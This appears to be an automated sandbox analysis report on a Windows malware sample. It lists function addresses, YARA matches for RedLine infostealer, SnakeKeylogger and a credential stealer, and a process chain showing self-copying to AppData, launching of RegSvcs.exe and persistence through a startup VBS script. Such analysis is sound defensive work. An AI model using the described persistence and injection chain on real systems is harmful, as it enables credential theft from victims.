                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005B19781_2_005B1978
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005C9AB51_2_005C9AB5
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_00617DDB1_2_00617DDB
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005B1D901_2_005B1D90
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005BBDA61_2_005BBDA6
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_0059DF001_2_0059DF00
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005A3FE01_2_005A3FE0
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_01058C381_2_01058C38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00408C602_2_00408C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040DC112_2_0040DC11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00407C3F2_2_00407C3F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00418CCC2_2_00418CCC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00406CA02_2_00406CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004028B02_2_004028B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041A4BE2_2_0041A4BE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00408C602_2_00408C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004182442_2_00418244
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402F202_2_00402F20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004193C42_2_004193C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004187882_2_00418788
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402F892_2_00402F89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402B902_2_00402B90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004073A02_2_004073A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02BF12B32_2_02BF12B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02BF12C02_2_02BF12C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02BF15602_2_02BF1560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02BF15502_2_02BF1550
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 5_2_01B883E05_2_01B883E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004016508_2_00401650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_012115608_2_01211560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_012115508_2_01211550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_012112C08_2_012112C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566B5E08_2_0566B5E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566C43F8_2_0566C43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566C1608_2_0566C160
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_056641E38_2_056641E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566F0388_2_0566F038
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566B3008_2_0566B300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_056693188_2_05669318
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566BE7F8_2_0566BE7F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05665E588_2_05665E58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566AE588_2_0566AE58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_056658208_2_05665820
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566B8C08_2_0566B8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566D8908_2_0566D890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566BBA28_2_0566BBA2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566E5488_2_0566E548
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566E5588_2_0566E558
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566B0228_2_0566B022
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566FC898_2_0566FC89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0566D8818_2_0566D881
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 43 times
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: String function: 00F00AE3 appears 70 times
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: String function: 00EE7DE1 appears 35 times
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: String function: 00F08900 appears 42 times
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: String function: 005B0AE3 appears 70 times
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: String function: 005B8900 appears 42 times
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: String function: 00597DE1 appears 36 times
                Source: 3i1gMM8K4z.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 5.2.ghauts.exe.3dd0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 1.2.ghauts.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000005.00000002.1925396391.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000001.00000002.1769744228.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4A06A GetLastError,FormatMessageW,0_2_00F4A06A
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F381CB AdjustTokenPrivileges,CloseHandle,0_2_00F381CB
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F387E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00F387E1
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005E81CB AdjustTokenPrivileges,CloseHandle,1_2_005E81CB
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005E87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_005E87E1
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00F4B3FB
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F5EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00F5EE0D
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F583BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00F583BB
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EE4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00EE4E89
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeFile created: C:\Users\user\AppData\Local\OkeghemJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeFile created: C:\Users\user\AppData\Local\Temp\aut9727.tmpJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs"
                Source: 3i1gMM8K4z.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 3i1gMM8K4z.exeReversingLabs: Detection: 65%
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeFile read: C:\Users\user\Desktop\3i1gMM8K4z.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\3i1gMM8K4z.exe "C:\Users\user\Desktop\3i1gMM8K4z.exe"
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeProcess created: C:\Users\user\AppData\Local\Okeghem\ghauts.exe "C:\Users\user\Desktop\3i1gMM8K4z.exe"
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\3i1gMM8K4z.exe"
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Okeghem\ghauts.exe "C:\Users\user\AppData\Local\Okeghem\ghauts.exe"
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Okeghem\ghauts.exe"
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeProcess created: C:\Users\user\AppData\Local\Okeghem\ghauts.exe "C:\Users\user\Desktop\3i1gMM8K4z.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\3i1gMM8K4z.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Okeghem\ghauts.exe "C:\Users\user\AppData\Local\Okeghem\ghauts.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Okeghem\ghauts.exe" Jump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeSection loaded: iphlpapi.dllJump to behavior
